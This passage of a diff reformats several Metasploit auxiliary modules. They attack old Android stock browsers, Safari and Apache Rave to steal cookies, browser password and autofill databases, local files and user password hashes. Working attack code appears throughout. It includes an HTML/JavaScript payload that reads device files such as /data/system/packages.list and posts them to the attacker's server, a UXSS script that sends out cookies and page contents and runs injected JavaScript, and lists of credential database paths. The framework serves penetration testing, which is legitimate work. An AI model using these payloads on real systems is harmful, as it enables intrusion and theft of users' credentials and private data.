-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser File Theft',
+        'Description' => %q{
+          This module steals the cookie, password, and autofill databases from the
+          Browser application on AOSP 4.3 and below.
+        },
+        'Author' => [
+          'Rafay Baloch', # Found UXSS bug in Android Browser
+          'joev'          # File redirect and msf module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
          # patch for file redirection, 2014
          ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
          ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=90222'] # the UXSS
        ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-     register_options([
+    register_options([
      OptString.new('ADDITIONAL_FILES', [
        false,
        'Comma-separated list of addition file URLs to steal.',
@@ -63,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary
    data = JSON.parse(request.body)
    contents = hex2bin(data['data'])
    file = File.basename(data['url'])
-    print_good("File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}")
+    print_good("File received: #{(contents.bytesize.to_f / 1000).round(2)}kb #{file}")
    loot_path = store_loot(
      file,
      'application/x-sqlite3',
@@ -75,7 +81,6 @@ class MetasploitModule < Msf::Auxiliary
    print_good("Saved to: #{loot_path}")
  end

-
  def file_urls
    default_urls = [
      'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db',
@@ -91,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
      default_urls = []
    end

-    default_urls + (datastore['ADDITIONAL_FILES']||'').split(',')
+    default_urls + (datastore['ADDITIONAL_FILES'] || '').split(',')
  end

  def exploit_html
@@ -140,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
                    return (c.length < 2) ? 0+c : c;
                  }).join(new String);
                  /*ensures there are no 'not allowed' responses that appear to be valid data*/
-                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>","")}') === -1) {
+                  if (hex.length && hex.indexOf('#{Rex::Text.to_hex("<html><body>not allowed</body></html>", "")}') === -1) {
                    top.postMessage({data:hex,url:location.href}, '*');
                  }
                  parent.postMessage(1,'*');
@@ -3,41 +3,47 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report
  include Msf::Exploit::JSObfu

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Android Browser "Open in New Tab" Cookie Theft',
-      'Description' => %q{
-        In Android's stock AOSP Browser application and WebView component, the
-        "open in new tab" functionality allows a file URL to be opened. On
-        versions of Android before 4.4, the path to the sqlite cookie
-        database could be specified. By saving a cookie containing a <script>
-        tag and then loading the sqlite database into the browser as an HTML file,
-        XSS can be achieved inside the cookie file, disclosing *all* cookies
-        (HttpOnly or not) to an attacker.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Discovery of "Open in new tab" bug
-        'joev'          # Cookie theft vector, msf module
-      ],
-      'License'     => MSF_LICENSE,
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Browser "Open in New Tab" Cookie Theft',
+        'Description' => %q{
+          In Android's stock AOSP Browser application and WebView component, the
+          "open in new tab" functionality allows a file URL to be opened. On
+          versions of Android before 4.4, the path to the sqlite cookie
+          database could be specified. By saving a cookie containing a <script>
+          tag and then loading the sqlite database into the browser as an HTML file,
+          XSS can be achieved inside the cookie file, disclosing *all* cookies
+          (HttpOnly or not) to an attacker.
+        },
+        'Author' => [
+          'Rafay Baloch', # Discovery of "Open in new tab" bug
+          'joev'          # Cookie theft vector, msf module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
          # the patch, released against 4.3 AOSP in February 2014
          ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'],
          ['URL', 'http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html']
        ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

-     register_options([
+    register_options([
      OptString.new('COOKIE_FILE', [
        true,
        'The cookie file (on older 2.x devices this is "webview.db")',
@@ -62,7 +68,7 @@ class MetasploitModule < Msf::Auxiliary

  def process_post(cli, request)
    data = hex2bin(request.body)
-    print_good "Cookies received: #{request.body.length.to_f/1024}kb"
+    print_good "Cookies received: #{request.body.length.to_f / 1024}kb"
    loot_path = store_loot(
      "android.browser.cookies",
      'application/x-sqlite3',
@@ -124,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
    |
  end

-  def cookie_path(file='')
+  def cookie_path(file = '')
    '/data/data/com.android.browser/databases/' + file
  end

@@ -134,6 +140,6 @@ class MetasploitModule < Msf::Auxiliary
  end

  def per_run_token
-    @token ||= Rex::Text.rand_text_alpha(rand(2)+1)
+    @token ||= Rex::Text.rand_text_alpha(rand(2) + 1)
  end
 end
@@ -8,38 +8,46 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Android Content Provider File Disclosure',
-      'Description' => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Content Provider File Disclosure',
+        'Description' => %q{
          This module exploits a cross-domain issue within the Android web browser to
-        exfiltrate files from a vulnerable device.
-      },
-      'Author'      =>
-        [
-          'Thomas Cannon',   # Original discovery, partial disclsoure
-          'jduck'            # Metasploit module
+          exfiltrate files from a vulnerable device.
+        },
+        'Author' => [
+          'Thomas Cannon', # Original discovery, partial disclsoure
+          'jduck' # Metasploit module
        ],
-      'License'     => MSF_LICENSE,
-      'Actions'     =>
-        [
+        'License' => MSF_LICENSE,
+        'Actions' => [
          [ 'WebServer' ]
        ],
-      'PassiveActions' =>
-        [
+        'PassiveActions' => [
          'WebServer'
        ],
-      'References' =>
-        [
+        'References' => [
          [ 'CVE', '2010-4804' ],
          [ 'URL', 'http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/' ]
        ],
-      'DefaultAction'  => 'WebServer'))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
-        OptString.new('FILES', [ false, "The remote file(s) to steal",
-          '/proc/version,/proc/self/status,/data/system/packages.list' ])
-      ])
+        OptString.new('FILES', [
+          false, "The remote file(s) to steal",
+          '/proc/version,/proc/self/status,/data/system/packages.list'
+        ])
+      ]
+    )
  end

  def on_request_uri(cli, request)
@@ -47,6 +55,7 @@ class MetasploitModule < Msf::Auxiliary
    selected_headers = [ 'user-agent', 'origin', 'referer' ]
    request.headers.each_key { |k|
      next if not selected_headers.include? k.downcase
+
      print_status("#{k}: #{request.headers[k]}")
    }

@@ -55,77 +64,76 @@ class MetasploitModule < Msf::Auxiliary
    # Only GET requests now..
    if request.uri =~ /\.html?$/
      filename = request.uri.split('/').last
-      target_files = datastore['FILES'].split(',').map{ |e|
+      target_files = datastore['FILES'].split(',').map { |e|
        "'%s'" % e
      }.join(',')

      upload_url = get_uri(cli)
-      upload_url << '/' if upload_url[-1,1] != '/'
+      upload_url << '/' if upload_url[-1, 1] != '/'
      upload_url << 'q'

-      html = <<-EOS
-<html>
-<body>
-<script lang=javascript>
-var target_files = Array(#{target_files});
-var results = new Array();
-function addField(form, name, value) {
-  var hf = document.createElement('input');
-  hf.setAttribute('type', 'hidden');
-  hf.setAttribute('name', name);
-  hf.setAttribute('value', value);
-  form.appendChild(hf);
-}
-function uploadFiles(files) {
-  var form = document.createElement('form');
-  form.setAttribute('method', 'POST');
-  form.setAttribute('action', '#{upload_url}');
-  var i = 0;
-  for (var fn in files) {
-    addField(form, 'f'+i, btoa(fn));
-    addField(form, 'd'+i, files[fn]);
-    i += 1;
-  }
-  document.body.appendChild(form);
-  form.submit();
-}
-for (var fn in target_files) {
-  fn = target_files[fn];
-  xh = new XMLHttpRequest();
-  xh.open('GET', fn, false);
-  xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
-  xh.send();
-}
-uploadFiles(results);
-</script>
-</body>
-</html>
-EOS
+      html = <<~EOS
+        <html>
+        <body>
+        <script lang=javascript>
+        var target_files = Array(#{target_files});
+        var results = new Array();
+        function addField(form, name, value) {
+          var hf = document.createElement('input');
+          hf.setAttribute('type', 'hidden');
+          hf.setAttribute('name', name);
+          hf.setAttribute('value', value);
+          form.appendChild(hf);
+        }
+        function uploadFiles(files) {
+          var form = document.createElement('form');
+          form.setAttribute('method', 'POST');
+          form.setAttribute('action', '#{upload_url}');
+          var i = 0;
+          for (var fn in files) {
+            addField(form, 'f'+i, btoa(fn));
+            addField(form, 'd'+i, files[fn]);
+            i += 1;
+          }
+          document.body.appendChild(form);
+          form.submit();
+        }
+        for (var fn in target_files) {
+          fn = target_files[fn];
+          xh = new XMLHttpRequest();
+          xh.open('GET', fn, false);
+          xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
+          xh.send();
+        }
+        uploadFiles(results);
+        </script>
+        </body>
+        </html>
+      EOS

      print_status("Sending payload HTML ...")
      send_response_html(cli, html,
-        {
-          'Cache-Control' => 'public',
-          'Content-Description' => 'File Transfer',
-          'Content-Disposition' => "attachment; filename=#{filename}",
-          'Content-Transfer-Encoding' => 'binary',
-          'Content-Type' => 'text/html'
-        })
-
+                         {
+                           'Cache-Control' => 'public',
+                           'Content-Description' => 'File Transfer',
+                           'Content-Disposition' => "attachment; filename=#{filename}",
+                           'Content-Transfer-Encoding' => 'binary',
+                           'Content-Type' => 'text/html'
+                         })

    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))

-      html = <<-EOS
-<html>
-<body>
-<script lang=javascript>
-setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
-setTimeout("document.location = '#{payload_fn}.html';", 500);
-</script>
-</body>
-</html>
-EOS
+      html = <<~EOS
+        <html>
+        <body>
+        <script lang=javascript>
+        setTimeout("document.location = 'content://com.android.htmlfileprovider/sdcard/download/#{payload_fn}.html';", 5000);
+        setTimeout("document.location = '#{payload_fn}.html';", 500);
+        </script>
+        </body>
+        </html>
+      EOS

      print_status("Sending initial HTML ...")
      send_response_html(cli, html)
@@ -134,7 +142,6 @@ EOS
  end

  def process_post(cli, request)
-
    results = {}

    if request and request.body
@@ -143,9 +150,9 @@ EOS
        if parts.length != 2
          print_error("Weird, we got a var that doesn't contain an equals: #{parts.inspect}")
        else
-          fln,fld = parts
+          fln, fld = parts
          fld = Rex::Text.uri_decode(fld).unpack('m').first
-          start = fln.slice!(0,1)
+          start = fln.slice!(0, 1)
          if start == "f"
            results[fln] ||= {}
            results[fln][:filename] = fld
@@ -165,7 +172,7 @@ EOS

      fn.gsub!(/[\/\\]/, '.')
      fn.gsub!(/^\./, '')
-      store_loot('android.fs.'+fn, 'application/octet-stream', cli.peerhost, data, fn)
+      store_loot('android.fs.' + fn, 'application/octet-stream', cli.peerhost, data, fn)
    }

    send_response_html(cli, "thx")
@@ -9,37 +9,45 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android Open Source Platform (AOSP) Browser UXSS',
-      'Description'    => %q{
-        This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
-        all versions of Android's open source stock browser before 4.4, and Android apps running
-        on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
-        to scrape both cookie data and page contents from a vulnerable browser window.
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
+        'Description' => %q{
+          This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
+          all versions of Android's open source stock browser before 4.4, and Android apps running
+          on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
+          to scrape both cookie data and page contents from a vulnerable browser window.

-        Target URLs that use X-Frame-Options can not be exploited with this vulnerability.
+          Target URLs that use X-Frame-Options can not be exploited with this vulnerability.

-        Some sample UXSS scripts are provided in data/exploits/uxss.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Original discovery, disclosure
-        'joev'          # Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [
-        [ 'WebServer' ]
-      ],
-      'PassiveActions' => [
-        'WebServer'
-      ],
-      'References' => [
-        [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
-        [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
-        [ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
-      ],
-      'DefaultAction'  => 'WebServer',
-      'DisclosureDate' => '2014-10-04'
-    ))
+          Some sample UXSS scripts are provided in data/exploits/uxss.
+        },
+        'Author' => [
+          'Rafay Baloch', # Original discovery, disclosure
+          'joev'          # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [ 'WebServer' ]
+        ],
+        'PassiveActions' => [
+          'WebServer'
+        ],
+        'References' => [
+          [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],
+          [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],
+          [ 'URL', 'http://trac.webkit.org/changeset/96826/webkit' ]
+        ],
+        'DefaultAction' => 'WebServer',
+        'DisclosureDate' => '2014-10-04',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('TARGET_URLS', [
@@ -67,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
      collect_data(request)
      send_response_html(cli, '')
    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
      domains = datastore['TARGET_URLS'].split(',')

      script = js_obfuscate <<-EOS
@@ -81,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
              'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
              '));}void(0);';
-            obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';
+            obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12) + 5)}';
          };
          document.body.appendChild(obj);
        });
@@ -8,40 +8,48 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Android Open Source Platform (AOSP) Browser UXSS',
-      'Description'    => %q{
-        This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
-        all versions of Android's open source stock browser before 4.4, and Android apps running
-        on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
-        to scrape both cookie data and page contents from a vulnerable browser window.
+    super(
+      update_info(
+        info,
+        'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',
+        'Description' => %q{
+          This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in
+          all versions of Android's open source stock browser before 4.4, and Android apps running
+          on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug
+          to scrape both cookie data and page contents from a vulnerable browser window.

-        If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
-        which will cause a popup window to be used. This requires a click from the user
-        and is much less stealthy, but is generally harmless-looking.
+          If your target URLs use X-Frame-Options, you can enable the "BYPASS_XFO" option,
+          which will cause a popup window to be used. This requires a click from the user
+          and is much less stealthy, but is generally harmless-looking.

-        By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
-        module also allows running arbitrary javascript in the context of the targeted URL.
-        Some sample UXSS scripts are provided in data/exploits/uxss.
-      },
-      'Author'         => [
-        'Rafay Baloch', # Original discovery, disclosure
-        'joev'          # Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [
-        [ 'WebServer' ]
-      ],
-      'PassiveActions' => [
-        'WebServer'
-      ],
-      'References' => [
-        [ 'URL', 'http://1337day.com/exploit/description/22581' ],
-        [ 'OSVDB', '110664' ],
-        [ 'CVE', '2014-6041' ]
-      ],
-      'DefaultAction'  => 'WebServer'
-    ))
+          By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this
+          module also allows running arbitrary javascript in the context of the targeted URL.
+          Some sample UXSS scripts are provided in data/exploits/uxss.
+        },
+        'Author' => [
+          'Rafay Baloch', # Original discovery, disclosure
+          'joev'          # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          [ 'WebServer' ]
+        ],
+        'PassiveActions' => [
+          'WebServer'
+        ],
+        'References' => [
+          [ 'URL', 'http://1337day.com/exploit/description/22581' ],
+          [ 'OSVDB', '110664' ],
+          [ 'CVE', '2014-6041' ]
+        ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('TARGET_URLS', [
@@ -79,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
      collect_data(request)
      send_response_html(cli, '')
    else
-      payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))
+      payload_fn = Rex::Text.rand_text_alphanumeric(4 + rand(8))
      domains = datastore['TARGET_URLS'].split(',')

      html = <<-EOS
@@ -8,30 +8,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Rave User Information Disclosure',
-      'Description'    => %q{
-        This module exploits an information disclosure in Apache Rave 0.20 and prior. The
-        vulnerability exists in the RPC API, which allows any authenticated user to
-        disclose information about all the users, including their password hashes. In order
-        to authenticate, the user can provide his own credentials. Also the default users
-        installed with Apache Rave 0.20 will be tried automatically. This module has been
-        successfully tested on Apache Rave 0.20.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Rave User Information Disclosure',
+        'Description' => %q{
+          This module exploits an information disclosure in Apache Rave 0.20 and prior. The
+          vulnerability exists in the RPC API, which allows any authenticated user to
+          disclose information about all the users, including their password hashes. In order
+          to authenticate, the user can provide his own credentials. Also the default users
+          installed with Apache Rave 0.20 will be tried automatically. This module has been
+          successfully tested on Apache Rave 0.20.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Andreas Guth', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2013-1814' ],
          [ 'OSVDB', '91235' ],
          [ 'BID', '58455' ],
          [ 'EDB', '24744']
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -39,7 +45,8 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
        OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
        OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
-      ])
+      ]
+    )
  end

  def post_auth?
@@ -50,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.to_s, "j_spring_security_check")

    res = send_request_cgi({
-      'uri'      => uri,
-      'method'   => 'POST',
+      'uri' => uri,
+      'method' => 'POST',
      'vars_post' => {
        'j_password' => username,
        'j_username' => password
@@ -69,8 +76,8 @@ class MetasploitModule < Msf::Auxiliary
    uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")

    res = send_request_cgi({
-      'uri'      => uri,
-      'method'   => 'GET',
+      'uri' => uri,
+      'method' => 'GET',
      'vars_get' => {
        'offset' => "#{offset}"
      },
@@ -82,7 +89,6 @@ class MetasploitModule < Msf::Auxiliary
    else
      return nil
    end
-
  end

  def setup
@@ -130,20 +136,18 @@ class MetasploitModule < Msf::Auxiliary
    create_credential_login(login_data)
  end

-
  def run
-
    print_status("#{rhost}:#{rport} - Fingerprinting...")
    res = send_request_cgi({
-      'uri'      => normalize_uri(target_uri.to_s, "login"),
-      'method'   => 'GET',
+      'uri' => normalize_uri(target_uri.to_s, "login"),
+      'method' => 'GET',
    })

    if not res
      print_error("#{rhost}:#{rport} - No response, aborting...")
      return
    elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
-      version =$1
+      version = $1
      if version <= "0.20"
        print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
      else
@@ -229,6 +233,5 @@ class MetasploitModule < Msf::Auxiliary
      end

    end
-
  end
 end
@@ -3,38 +3,45 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
-      'Description' => %q{
-        A vulnerability exists in versions of OSX, iOS, and Windows Safari released
-        before April 8, 2015 that allows the non-HTTPOnly cookies of any
-        domain to be stolen.
-      },
-      'License'     => MSF_LICENSE,
-      'Author'      => [
-        'Jouko Pynnonen', # Initial discovery and disclosure
-        'joev',           # msf module
-      ],
-      'References'  => [
-        [ 'CVE', '2015-1126' ],
-        [ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
-      ],
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer',
-      'DisclosureDate' => '2015-04-08'
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
+        'Description' => %q{
+          A vulnerability exists in versions of OSX, iOS, and Windows Safari released
+          before April 8, 2015 that allows the non-HTTPOnly cookies of any
+          domain to be stolen.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jouko Pynnonen', # Initial discovery and disclosure
+          'joev',           # msf module
+        ],
+        'References' => [
+          [ 'CVE', '2015-1126' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
+        ],
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'DisclosureDate' => '2015-04-08',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('URIPATH', [false, 'The URI to use for this exploit (default is random)']),
-      OptPort.new('SRVPORT',   [true, 'The local port to use for the FTP server', 5555 ]),
-      OptPort.new('HTTPPORT',  [true, 'The HTTP server port', 8080]),
+      OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
+      OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
      OptString.new('TARGET_DOMAINS', [
        true,
        'The comma-separated list of domains to steal non-HTTPOnly cookies from.',
@@ -43,7 +50,6 @@ class MetasploitModule < Msf::Auxiliary
    ])
  end

-
  #
  # Start the FTP and HTTP server
  #
@@ -54,12 +60,11 @@ class MetasploitModule < Msf::Auxiliary
    @http_service.wait
  end

-
  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
-  def start_http(opts={})
+  def start_http(opts = {})
    # Ensture all dependencies are present before initializing HTTP
    use_zlib

@@ -74,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
-      'Comm'       => comm
+      'Comm' => comm
    }.update(opts)

    # Start a new HTTP server
@@ -84,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
      opts['ServerHost'],
      datastore['SSL'],
      {
-        'Msf'        => framework,
+        'Msf' => framework,
        'MsfExploit' => self,
      },
      opts['Comm'],
@@ -97,8 +102,8 @@ class MetasploitModule < Msf::Auxiliary
    # provided.
    uopts = {
      'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
+        on_request_uri(cli, req)
+      },
      'Path' => resource_uri
    }.update(opts['Uri'] || {})

@@ -117,10 +122,10 @@ class MetasploitModule < Msf::Auxiliary
  #
  # Lookup the right address for the client
  #
-  def lookup_lhost(c=nil)
+  def lookup_lhost(c = nil)
    # Get the source address
    if datastore['SRVHOST'] == '0.0.0.0'
-      Rex::Socket.source_address( c || '50.50.50.50')
+      Rex::Socket.source_address(c || '50.50.50.50')
    else
      datastore['SRVHOST']
    end
@@ -162,7 +167,6 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
  #
  # Ensures that gzip can be used.  If not, an exception is generated.  The
  # exception is only raised if the DisableGzip advanced option has not been
@@ -174,19 +178,17 @@ class MetasploitModule < Msf::Auxiliary
    end
  end

-
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    return @uri_path if @uri_path

-    @uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
+    @uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
    @uri_path = '/' + @uri_path if @uri_path !~ /^\//
    @uri_path
  end

-
  #
  # Handle HTTP requests and responses
  #
@@ -228,7 +230,7 @@ class MetasploitModule < Msf::Auxiliary
  #
  # Create an HTTP response and then send it
  #
-  def send_response(cli, code, message='OK', html='')
+  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'text/html'
@@ -12,28 +12,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Mac OS X Safari .webarchive File Format UXSS',
-      'Description'    => %q{
-        Generates a .webarchive file for Mac OS X Safari that will attempt to
-        inject cross-domain Javascript (UXSS), silently install a browser
-        extension, collect user information, steal the cookie database,
-        and steal arbitrary local files.
+    super(
+      update_info(
+        info,
+        'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
+        'Description' => %q{
+          Generates a .webarchive file for Mac OS X Safari that will attempt to
+          inject cross-domain Javascript (UXSS), silently install a browser
+          extension, collect user information, steal the cookie database,
+          and steal arbitrary local files.

-        When opened on the target machine the webarchive file must not have the
-        quarantine attribute set, as this forces the webarchive to execute in a
-        sandbox.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'joev',
-      'References'     =>
-        [
+          When opened on the target machine the webarchive file must not have the
+          quarantine attribute set, as this forces the webarchive to execute in a
+          sandbox.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'joev',
+        'References' => [
          ['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
        ],
-      'DisclosureDate' => '2013-02-22',
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'DefaultAction'  => 'WebServer'))
+        'DisclosureDate' => '2013-02-22',
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
  end

  def run
@@ -71,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
  # @return [String] filename where we are storing the data
  def record_data(data, cli)
    if data.is_a? Hash
-      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
+      file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
    end
    store_loot(
      file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
@@ -100,5 +108,4 @@ class MetasploitModule < Msf::Auxiliary
    end
  end
